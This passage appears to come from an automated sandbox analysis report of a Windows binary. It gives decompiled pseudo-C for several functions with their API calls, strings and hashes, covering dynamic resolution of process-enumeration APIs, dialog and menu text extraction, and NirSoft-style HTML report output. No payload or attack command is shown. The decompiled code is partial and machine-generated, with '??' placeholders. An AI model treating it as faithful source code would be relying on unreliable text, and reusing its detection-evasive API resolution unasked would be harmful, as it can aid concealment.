                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                                                                                                                          				 *0x40f83c = _t2;
                                                                                                                                                                                                                          				if(_t2 != 0) {
                                                                                                                                                                                                                          					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                                                                                                                          					 *0x40f834 = _t2;
                                                                                                                                                                                                                          					if(_t2 != 0) {
                                                                                                                                                                                                                          						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                                                                                                                          						 *0x40f830 = _t2;
                                                                                                                                                                                                                          						if(_t2 != 0) {
                                                                                                                                                                                                                          							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                                                                                                                          							 *0x40f5c4 = _t2;
                                                                                                                                                                                                                          							if(_t2 != 0) {
                                                                                                                                                                                                                          								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                                                                                                                          								 *0x40f828 = _t2;
                                                                                                                                                                                                                          								if(_t2 != 0) {
                                                                                                                                                                                                                          									 *0x4101b8 = 1;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				goto L9;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                                          • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                                                                          • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                          			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				char _v516;
                                                                                                                                                                                                                          				void _v1026;
                                                                                                                                                                                                                          				char _v1028;
                                                                                                                                                                                                                          				void _v1538;
                                                                                                                                                                                                                          				char _v1540;
                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                          				intOrPtr* _t50;
                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t50 = __ecx;
                                                                                                                                                                                                                          				_push(0x1fe);
                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                                                                                                                          					_v1540 = 0;
                                                                                                                                                                                                                          					memset( &_v1538, ??, ??);
                                                                                                                                                                                                                          					_v1028 = 0;
                                                                                                                                                                                                                          					memset( &_v1026, 0, 0x1fe);
                                                                                                                                                                                                                          					_v516 = 0;
                                                                                                                                                                                                                          					memset( &_v514, 0, 0x1fe);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                                                                                                                          					if (_t39 != 0) goto L3;
                                                                                                                                                                                                                          					return _t39;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v516 = 0;
                                                                                                                                                                                                                          				memset( &_v514, ??, ??);
                                                                                                                                                                                                                          				_v1028 = 0;
                                                                                                                                                                                                                          				memset( &_v1026, 0, 0x1fe);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                                          • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                                                                          • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                          			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                                                                                                                          				void _v8202;
                                                                                                                                                                                                                          				short _v8204;
                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                          				short _t29;
                                                                                                                                                                                                                          				short _t40;
                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                          				struct HMENU__* _t43;
                                                                                                                                                                                                                          				short _t50;
                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                          				struct HMENU__* _t59;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x2008, __ecx);
                                                                                                                                                                                                                          				_t65 = _a8 - 4;
                                                                                                                                                                                                                          				if(_a8 != 4) {
                                                                                                                                                                                                                          					__eflags = _a8 - 5;
                                                                                                                                                                                                                          					if(_a8 == 5) {
                                                                                                                                                                                                                          						_t50 =  *0x40fe2c; // 0x0
                                                                                                                                                                                                                          						__eflags = _t50;
                                                                                                                                                                                                                          						if(_t50 == 0) {
                                                                                                                                                                                                                          							L8:
                                                                                                                                                                                                                          							_push(_a12);
                                                                                                                                                                                                                          							_t27 = 5;
                                                                                                                                                                                                                          							E00405E8D(_t27);
                                                                                                                                                                                                                          							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                                                                                                                                                          							__eflags = _t29;
                                                                                                                                                                                                                          							_a8 = _t29;
                                                                                                                                                                                                                          							if(_t29 == 0) {
                                                                                                                                                                                                                          								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_v8204 = 0;
                                                                                                                                                                                                                          							memset( &_v8202, 0, 0x2000);
                                                                                                                                                                                                                          							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                                                                                                                          							__eflags = _v8204;
                                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                                          								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							EnumChildWindows(_a8, E0040614F, 0);
                                                                                                                                                                                                                          							DestroyWindow(_a8);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                          								_t40 =  *_t50;
                                                                                                                                                                                                                          								__eflags = _t40;
                                                                                                                                                                                                                          								if(_t40 == 0) {
                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								__eflags = _t40 - _a12;
                                                                                                                                                                                                                          								if(_t40 != _a12) {
                                                                                                                                                                                                                          									_t50 = _t50 + 4;
                                                                                                                                                                                                                          									__eflags = _t50;
                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								goto L13;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_push(_a12);
                                                                                                                                                                                                                          					_t41 = 4;
                                                                                                                                                                                                                          					E00405E8D(_t41);
                                                                                                                                                                                                                          					_pop(_t52);
                                                                                                                                                                                                                          					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                                                                                                                          					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                                                                                                                                                          					_t59 = _t43;
                                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                                          					_push(_t59);
                                                                                                                                                                                                                          					_push(_a12);
                                                                                                                                                                                                                          					E0040605E(_t52, _t65);
                                                                                                                                                                                                                          					DestroyMenu(_t59);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L13:
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          0x00406229
                                                                                                                                                                                                                          0x0040622a
                                                                                                                                                                                                                          0x0040622f
                                                                                                                                                                                                                          0x00406236
                                                                                                                                                                                                                          0x0040623c
                                                                                                                                                                                                                          0x00406243
                                                                                                                                                                                                                          0x00406245
                                                                                                                                                                                                                          0x00406247
                                                                                                                                                                                                                          0x00406248
                                                                                                                                                                                                                          0x0040624b
                                                                                                                                                                                                                          0x00406254
                                                                                                                                                                                                                          0x00406254
                                                                                                                                                                                                                          0x0040632d
                                                                                                                                                                                                                          0x00406334

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadMenuW.USER32 ref: 00406236
                                                                                                                                                                                                                            • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                                                                                                                            • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                                                                                                                            • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                                                                                                                            • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004062DA
                                                                                                                                                                                                                          • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                                                                                                                          • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                                                                                                                            • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                                          • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                                                                          • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                          			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				void _v2050;
                                                                                                                                                                                                                          				char _v2052;
                                                                                                                                                                                                                          				void _v4098;
                                                                                                                                                                                                                          				long _v4100;
                                                                                                                                                                                                                          				void _v6146;
                                                                                                                                                                                                                          				char _v6148;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                                          				intOrPtr* _t49;
                                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                          				intOrPtr _t62;
                                                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t49 = __ecx;
                                                                                                                                                                                                                          				E0040B550(0x1800, __ecx);
                                                                                                                                                                                                                          				_t57 = _t49;
                                                                                                                                                                                                                          				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                                                                                                                          				_v4100 = 0;
                                                                                                                                                                                                                          				memset( &_v4098, 0, 0x7fe);
                                                                                                                                                                                                                          				_v2052 = 0;
                                                                                                                                                                                                                          				memset( &_v2050, 0, 0x7fe);
                                                                                                                                                                                                                          				_v6148 = 0;
                                                                                                                                                                                                                          				memset( &_v6146, 0, 0x7fe);
                                                                                                                                                                                                                          				_t59 = _t58 + 0x24;
                                                                                                                                                                                                                          				_t62 =  *0x40fe30; // 0x0
                                                                                                                                                                                                                          				if(_t62 != 0) {
                                                                                                                                                                                                                          					_push(0x40fe30);
                                                                                                                                                                                                                          					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                                                                                                                          					_push(0x400);
                                                                                                                                                                                                                          					_push( &_v2052);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t59 = _t59 + 0x10;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t63 =  *0x40fe28; // 0x0
                                                                                                                                                                                                                          				if(_t63 != 0) {
                                                                                                                                                                                                                          					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                                                                                                                                          				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                                                                                                                                                          				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                                                                                                                          				_push(0x400);
                                                                                                                                                                                                                          				_push( &_v6148);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                                                                                                                                                          				_t64 = _a8 - 5;
                                                                                                                                                                                                                          				if(_a8 == 5) {
                                                                                                                                                                                                                          					return E00407D03(_t57, _t64, _a4);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t43;
                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                          0x004082e7
                                                                                                                                                                                                                          0x004082ec
                                                                                                                                                                                                                          0x004082f0
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004082f5
                                                                                                                                                                                                                          0x004082fe

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                          • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                                                                          • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                                                                                                                                                          				void _v526;
                                                                                                                                                                                                                          				long _v528;
                                                                                                                                                                                                                          				wchar_t* _t17;
                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                          				wchar_t* _t50;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t50 = __edi;
                                                                                                                                                                                                                          				if(__esi[0] != 0x3a) {
                                                                                                                                                                                                                          					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                                                                                                                                          					if(_t17 == 0) {
                                                                                                                                                                                                                          						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                                                                                                                                                          						if(_t40 < 0) {
                                                                                                                                                                                                                          							if( *__esi != 0x5c) {
                                                                                                                                                                                                                          								wcscpy(__edi, __esi);
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_v528 = 0;
                                                                                                                                                                                                                          								memset( &_v526, 0, 0x208);
                                                                                                                                                                                                                          								E00404C08( &_v528);
                                                                                                                                                                                                                          								memcpy(__edi,  &_v528, 4);
                                                                                                                                                                                                                          								__edi[1] = __edi[1] & 0x00000000;
                                                                                                                                                                                                                          								wcscat(__edi, __esi);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_v528 = 0;
                                                                                                                                                                                                                          							memset( &_v526, 0, 0x208);
                                                                                                                                                                                                                          							E00404C08( &_v528);
                                                                                                                                                                                                                          							wcscpy(__edi,  &_v528);
                                                                                                                                                                                                                          							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                          						return _t50;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push( &(_t17[0]));
                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                          					wcscpy(_t50, ??);
                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                                          			}


                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00409223
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                                                                            • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                                                                                                                            • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                                                                                                                            • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00409282
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040928D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409269
                                                                                                                                                                                                                            • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                                                                                                                            • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004092B1
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004092CC
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004092D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                          • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                                                                          • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                                                          			E00409C70(signed int* _a4) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                          				char* _v16;
                                                                                                                                                                                                                          				int _v18;
                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t22;
                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                          				char* _t28;
                                                                                                                                                                                                                          				int _t31;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t21 = _a4;
                                                                                                                                                                                                                          				if( *_t21 == 0) {
                                                                                                                                                                                                                          					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          					_v8 = _t22;
                                                                                                                                                                                                                          					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                                                                                                                                                          					 *_a4 = _t23;
                                                                                                                                                                                                                          					_t24 = _t23 ^ _v8;
                                                                                                                                                                                                                          					if((_t24 & 0xfff00000) != 0) {
                                                                                                                                                                                                                          						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                                                                                                                                                          						_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                          						_v12 = _t26;
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosw");
                                                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                                                          						asm("movsw");
                                                                                                                                                                                                                          						_t28 =  &_v36;
                                                                                                                                                                                                                          						asm("movsb");
                                                                                                                                                                                                                          						_v16 = _t28;
                                                                                                                                                                                                                          						_v20 = strlen(_t28);
                                                                                                                                                                                                                          						_t31 = strlen( &_v36);
                                                                                                                                                                                                                          						_v18 = _t31;
                                                                                                                                                                                                                          						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return _t24;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t21;
                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcstrlen
                                                                                                                                                                                                                          • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 1027343248-2054640941
                                                                                                                                                                                                                          • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                                                                          • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
